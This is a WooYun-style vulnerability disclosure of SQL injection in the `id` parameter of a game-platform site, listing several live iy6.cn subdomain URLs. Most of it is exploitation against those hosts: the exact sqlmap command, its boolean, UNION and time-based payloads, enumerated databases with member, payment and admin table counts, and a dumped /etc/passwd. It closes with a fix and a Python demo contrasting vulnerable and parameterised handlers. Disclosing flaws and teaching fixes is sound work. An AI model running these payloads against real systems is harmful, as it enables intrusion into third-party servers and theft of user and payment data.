2015-10-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-11-16: The vendor has proactively ignored the vulnerability; details are now public.
The same parameter is injectable (the `id` parameter of `?action=detail`)!

Injection points, for example:

http://zxy.iy6.cn/?action=detail&id=85
http://jjsg.iy6.cn/?action=detail&id=4825
http://xyfm.iy6.cn/?action=detail&id=2935
http://wj.iy6.cn/?action=detail&id=3581
http://rxhzw.iy6.cn/?action=detail&id=26
http://wj2.iy6.cn/?action=detail&id=3226
http://smsg.iy6.cn/?action=detail&id=2946
http://xyfm.iy6.cn/?action=detail&id=2935
……

and many more. Taking the first one, http://zxy.iy6.cn/?action=detail&id=85, as the example, test it with sqlmap:
sqlmap.py -u "http://zxy.iy6.cn/?action=detail&id=85" --dbms "MySQL" --current-db --current-user --is-dba --hostname
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=detail&id=85) AND 9543=9543 AND (7966=7966

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: action=detail&id=-8903) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71776a6971,0x484e58444e4164536669,0x7167737171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=detail&id=85) AND SLEEP(5) AND (3740=3740
---
[19:50:14] [INFO] testing MySQL
[19:50:14] [INFO] confirming MySQL
[19:50:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[19:50:14] [INFO] fetching current user
current user: 'root@localhost'
[19:50:15] [INFO] fetching current database
current database: 'iy6'
[19:50:15] [INFO] fetching server hostname
hostname: 'localhost.localdomain'
[19:50:15] [INFO] testing if current user is DBA
[19:50:15] [INFO] fetching current user
current user is DBA: True
database management system users [6]:
[*] ''@'localhost.localdomain'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'c65mini.localdomain'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
available databases [7]:
[*] information_schema
[*] iy6
[*] mysql
[*] performance_schema
[*] qihihi
[*] qq990test
[*] test

Table row counts per database (the notes after a row are the reporter's annotations):

Database: qq990test
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| kmy_member                      | 527473  | over 500,000 users
| kmy_member_login_game_record    | 106896  | over 100,000 login records
| kmy_z_game_card                 | 48793   | tens of thousands of game cards
| kmy_z_card_record               | 32676   |
| kmy_operationlog                | 9329    |
| kmy_game_charge_record          | 5497    |
| kmy_game_server                 | 5235    |
| kmy_pay_record                  | 4916    | thousands of payment records
| kmy_news                        | 3359    |
| kmy_platform_money_record       | 3060    |
| kmy_access                      | 1582    |
| kmy_kaifu                       | 1263    |
| kmy_loginlog                    | 798     | login records
| kmy_menu                        | 635     |
| kmy_fail_charge                 | 336     |
| kmy_member_copy                 | 204     |
| kmy_game_charge_retry           | 201     |
| kmy_z_card_type                 | 199     |
| kmy_z_charge_record             | 131     |
| kmy_z_charge_username           | 130     |
| kmy_tg_link                     | 121     |
| kmy_findpwd_record              | 86      | password-recovery records
| kmy_game_pic                    | 77      |
| kmy_game                        | 67      |
| kmy_game_leftmenu               | 47      |
| kmy_friend_link                 | 33      |
| kmy_pay_type                    | 23      |
| kmy_faq                         | 22      |
| kmy_user                        | 15      | admin users
| kmy_pic                         | 13      |
| kmy_cache                       | 9       |
| kmy_single_page                 | 8       |
| kmy_role                        | 6       |
| kmy_tg_member                   | 4       | promotion (affiliate) members
| kmy_notification                | 2       |
| kmy_config                      | 1       |
+---------------------------------+---------+

Database: iy6
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| kmy_z_game_card                 | 66960   | over 60,000 game cards
| kmy_member_login_game_record    | 31457   |
| kmy_member                      | 19818   | nearly 20,000 users
| kmy_operationlog                | 17571   |
| kmy_pay_record                  | 14445   | over 10,000 payment records
| kmy_game_charge_record          | 9640    |
| kmy_z_card_record               | 6665    |
| kmy_news                        | 4562    |
| kmy_game_server                 | 4298    |
| kmy_kaifu                       | 3927    |
| kmy_platform_money_record       | 2939    |
| kmy_member_server_rolename      | 2741    |
| kmy_access                      | 1825    |
| kmy_z_charge_username           | 1722    |
| kmy_z_charge_record             | 1525    |
| kmy_loginlog                    | 1374    | login records
| kmy_menu                        | 849     |
| kmy_tg_link                     | 628     |
| kmy_game_pic                    | 193     |
| kmy_z_card_type                 | 135     |
| kmy_game                        | 94      |
| kmy_game_leftmenu               | 81      |
| kmy_findpwd_record              | 51      |
| kmy_friend_link                 | 51      |
| kmy_game_charge_retry           | 44      |
| kmy_tg_memberlink_change_record | 41      |
| kmy_tg_member                   | 32      | promotion (affiliate) users
| kmy_faq                         | 21      |
| kmy_pay_type                    | 19      |
| kmy_user                        | 18      | admin users
| kmy_pic                         | 13      |
| kmy_cache                       | 9       |
| kmy_single_page                 | 8       |
| kmy_role                        | 5       |
| kmy_notification                | 2       |
| kmy_config                      | 1       |
+---------------------------------+---------+

Database: qihihi
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| pre_userplaygamelog             | 1393154 | over a million user play records
| pre_z_game_card                 | 112471  | over 100,000 game cards
| pre_user                        | 81905   | over 80,000 users
| pre_userpingtaibilog            | 37335   | over 30,000 platform-currency records
| pre_card                        | 25281   |
| pre_payorder                    | 23073   |
| pre_longnews                    | 12900   |
| pre_gameserver                  | 7435    |
| pre_kaifubiao                   | 6651    |
| pre_news                        | 6149    |
| pre_z_fail_charge               | 5214    |
| pre_log                         | 3687    |
| pre_longplus                    | 2657    |
| pre_usergetpwdlog               | 1361    |
| pre_paytoolog                   | 1209    |
| pre_z_charge_username           | 513     |
| pre_z_charge_record             | 496     |
| pre_longnewstype                | 375     |
| pre_z_card_type                 | 233     |
| pre_longplustype                | 205     |
| pre_game                        | 93      |
| pre_plus                        | 32      |
| pre_longplustype_copy           | 29      |
| pre_role_user                   | 24      |
| pre_paytype                     | 22      |
| pre_link                        | 21      |
| pre_node                        | 16      |
| pre_adminuser                   | 13      | admin users
| pre_access                      | 11      |
| pre_plustype                    | 9       |
| pre_userpingtaibilogtype        | 6       |
| pre_adminaddpingtaibilog        | 5       |
| pre_gameserverstatus            | 5       |
| pre_ads                         | 4       |
| pre_role                        | 4       |
| pre_cpsurl                      | 3       | ?
| pre_newstype                    | 2       |
| pre_adstype                     | 1       |
| pre_cpsuser                     | 1       | super administrator?
| pre_linktype                    | 1       |
+---------------------------------+---------+

Database: mysql
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| help_relation                   | 1092    |
| help_topic                      | 535     |
| help_keyword                    | 487     |
| help_category                   | 40      |
| `user`                          | 6       |
| db                              | 2       |
| proxies_priv                    | 2       |
+---------------------------------+---------+
Arbitrary file read: /etc/passwd. Because the application connects as root@localhost and sqlmap confirms the account is DBA, the MySQL FILE privilege is available, so server files can be pulled through the same injection point:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nginx:x:498:499::/home/nginx:/bin/bash
mysql:x:500:500::/home/mysql:/sbin/nologin
Fix: filter the `id` parameter (validate it as an integer or bind it as a query parameter) and restrict database privileges (the application should not connect as root).
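The injection reported above and the query-side half of the fix, worked through as an added example; this is not the page's or the vendor's code. It assumes the query shape implied by sqlmap's boolean payload (`85) AND 9543=9543 AND (7966=7966` only balances if the raw value lands inside `WHERE (id = ...)`), uses an in-memory SQLite database in place of the site's MySQL, and constructs its own tables and rows: the table names `kmy_news` and `kmy_user` come from the sqlmap listing, but their columns and contents are invented for illustration.

```python
import sqlite3

# Constructed stand-in for the site's database. kmy_news and kmy_user are table
# names from the sqlmap listing; the columns and rows below are invented.
SCHEMA = """
CREATE TABLE kmy_news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE kmy_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO kmy_news VALUES (85, 'sample title', 'sample body');
INSERT INTO kmy_user VALUES (1, 'admin', 'sample-hash');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_detail(con, id_param):
    """?action=detail&id=... handler as the reported payloads imply it was written.

    The boolean payload only yields balanced SQL if the raw value is spliced
    inside parentheses, so the assumed query is WHERE (id = <raw value>) built
    by string formatting (assumption; the real source is not on the page).
    """
    sql = "SELECT title, body FROM kmy_news WHERE (id = %s)" % id_param
    return con.execute(sql).fetchall()


def hardened_detail(con, id_param):
    """Same lookup with the query-side fixes the report asks for: reject
    anything that is not an integer, and bind the value as a parameter so
    it can never become part of the SQL text."""
    try:
        id_int = int(id_param)
    except (TypeError, ValueError):
        return []
    return con.execute(
        "SELECT title, body FROM kmy_news WHERE (id = ?)", (id_int,)
    ).fetchall()


# Payloads in the shape sqlmap reported. SQLite has no `#` comment and no
# SLEEP(), so the UNION payload ends with `--` instead of `#` and the
# time-based variant is not reproduced here.
BOOL_TRUE = "85) AND 9543=9543 AND (7966=7966"
BOOL_FALSE = "85) AND 9543=9544 AND (7966=7966"
UNION_DUMP = "-8903) UNION ALL SELECT username, password FROM kmy_user--"


def run_demo():
    """Return what each handler gives back for a benign id and for each
    payload, so the difference between the two is checkable."""
    con = make_db()
    results = {}
    for name, handler in (("vulnerable", vulnerable_detail),
                          ("hardened", hardened_detail)):
        results[name] = {
            "benign": handler(con, "85"),        # normal request
            "bool_true": handler(con, BOOL_TRUE),   # vulnerable: same row as benign
            "bool_false": handler(con, BOOL_FALSE), # vulnerable: empty => blind oracle
            "union": handler(con, UNION_DUMP),      # vulnerable: rows from kmy_user
        }
    return results


if __name__ == "__main__":
    for handler, outcomes in run_demo().items():
        for case, rows in outcomes.items():
            print(f"{handler:10s} {case:10s} -> {rows}")
```

The vulnerable handler returns the article for both the benign id and the "true" boolean payload, nothing for the "false" one (that difference is the blind oracle sqlmap used), and the `kmy_user` row for the UNION payload; the hardened handler returns the article only for the plain integer and an empty result for every payload. The privilege half of the fix is not shown in code: the application should connect with a dedicated account granted only the statements it needs on its own schema, not as root, whose FILE privilege is what turned this injection into the /etc/passwd read above.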
Vendor response: unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 20 (WooYun rating)